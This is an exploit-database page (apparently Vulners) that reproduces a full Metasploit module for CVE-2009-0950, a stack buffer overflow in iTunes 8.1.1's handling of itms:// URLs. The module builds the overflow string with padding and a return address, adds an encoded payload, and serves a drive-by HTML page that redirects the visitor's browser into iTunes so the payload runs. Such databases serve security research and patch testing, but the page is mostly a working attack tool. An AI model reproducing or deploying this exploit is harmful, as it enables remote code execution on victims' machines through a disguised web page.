Vulners
Lucene search
Apple iTunes 8.1.1 (ITMS) Multiple Protocol Handler BOF Exploit (meta)
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | Apple iTunes 8.1.x (daap) Buffer overflow remote exploit | 14 Jan 201000:00 | – | zdt |
| Apple iTunes 8.1.1 (ITMS) Multiple Protocol Handler BOF Exploit (meta) | 3 Jun 200900:00 | – | zdt |
| Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win) | 12 Jun 200900:00 | – | zdt |
 | iTunes < 8.2 Remote Overflow | 18 Aug 200400:00 | – | nessus |
| Apple iTunes < 8.2 itms: URI Handling Overflow (credentialed check) | 2 Jun 200900:00 | – | nessus |
| Apple iTunes < 8.2 itms: URI Handling Overflow (uncredentialed check) | 2 Jun 200900:00 | – | nessus |
| iTunes < 8.2 itms: URL Stack Overflow (Mac OS X) | 2 Jun 200900:00 | – | nessus |
 | CVE-2009-0950 | 3 Jun 200900:00 | – | circl |
 | Apple iTunes Protocol Handler Stack Buffer Overflow (CVE-2009-0950) | 1 Feb 201000:00 | – | checkpoint_advisories |
 | CVE-2009-0950 | 2 Jun 200918:00 | – | cve |
10
##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple OS X iTunes 8.1.1 ITMS Overflow',
'Description' => %q{
This modules exploits a stack-based buffer overflow in iTunes
itms:// URL parsing. It is accessible from the browser and
in Safari, itms urls will be opened in iTunes automatically.
Because iTunes is multithreaded, only vfork-based payloads should
be used.
},
'Author' => [ 'Will Drewry <[email protected]>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
['CVE', 'CVE-2009-0950'],
['URL', 'http://support.apple.com/kb/HT3592'],
['URL', 'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html'],
],
'Payload' =>
{
'Space' => 1024, # rough estimate of what browsers will pass.
'DisableNops' => true, # don't pad out the space.
'BadChars' => '',
# The encoder must be URL-safe otherwise it will be automatically
# URL encoded.
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX', # See the comments below
'BufferOffset' => 3, # See the comments below
},
},
'Targets' =>
[
[
'OS X',
{
'Platform' => [ 'osx' ],
'Arch' => ARCH_X86,
'Addr' => 'ATe'
},
],
[
'Windows (not done yet)',
{
'Platform' => [ 'win' ],
'Arch' => ARCH_X86,
'Addr' => 'CCCC'
},
],
],
'DisclosureDate' => 'June 1, 2009',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
], self.class)
end
# Generate distribution script, which calls our payload using JavaScript.
def generate_itms_page(p)
# Set the base itms url.
# itms:// or itmss:// can be used. The trailing colon is used
# to start the attack. All data after the colon is copied to the
# stack buffer.
itms_base_url = "itms://:"
itms_base_url << "A"*268 # Fill up the real buffer
itms_base_url << "XXXXAAAAZZZZYYYY" # $ebx, $esi, $edi, $ebp
itms_base_url << target['Addr'] # hullo there, jmp *%ecx!
# The first '/' in the buffer will terminate the copy to the stack buffer.
# In addition, $ecx will be left pointing to the last 6 bytes of the heap
# buffer containing the full URL. However, if a colon and a ? occur after
# the value in ecx will point to that point in the heap buffer. In our
# case, it will point to the beginning. The ! is there to make the
# alphanumeric shellcode execute easily. (This is why we need an offset
# of 3 in the payload).
itms_base_url << "/:!?" # Truncate the stack overflow and prep for payload
itms_base_url << p # Wooooooo! Payload time.
# We drop on a few extra bytes as the last few bytes can sometimes be
# corrupted.
itms_base_url << "AAAA"
# Use the pattern creator to simplify exploit creation :)
# itms_base_url << Rex::Text.pattern_create(1024,
# Rex::Text::DefaultPatternSets)
# Return back an example URL. Using an iframe doesn't work with all
# browsers, but that's easy enough to fix if you need to.
return String(<<-EOS)
<html><head><title>iTunes loading . . .</title></head>
<body>
<script>document.location.assign("#{itms_base_url}");</script>
<p>iTunes should open automatically, but if it doesn't, click to
<a href="#{itms_base_url}">continue</a>.</p>
</body>
</html>
EOS
end
def on_request_uri(cli, request)
print_status("Generating payload...")
return unless (p = regenerate_payload(cli))
#print_status("=> #{payload.encoded}")
print_status("=> #{payload.encoded.length} bytes")
print_status("Generating HTML container...")
page = generate_itms_page(payload.encoded)
#print_status("=> #{page}")
print_status("Sending itms page to #{cli.peerhost}:#{cli.peerport}")
header = { 'Content-Type' => 'text/html' }
send_response_html(cli, page, header)
handler(cli)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jun 2009 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.82109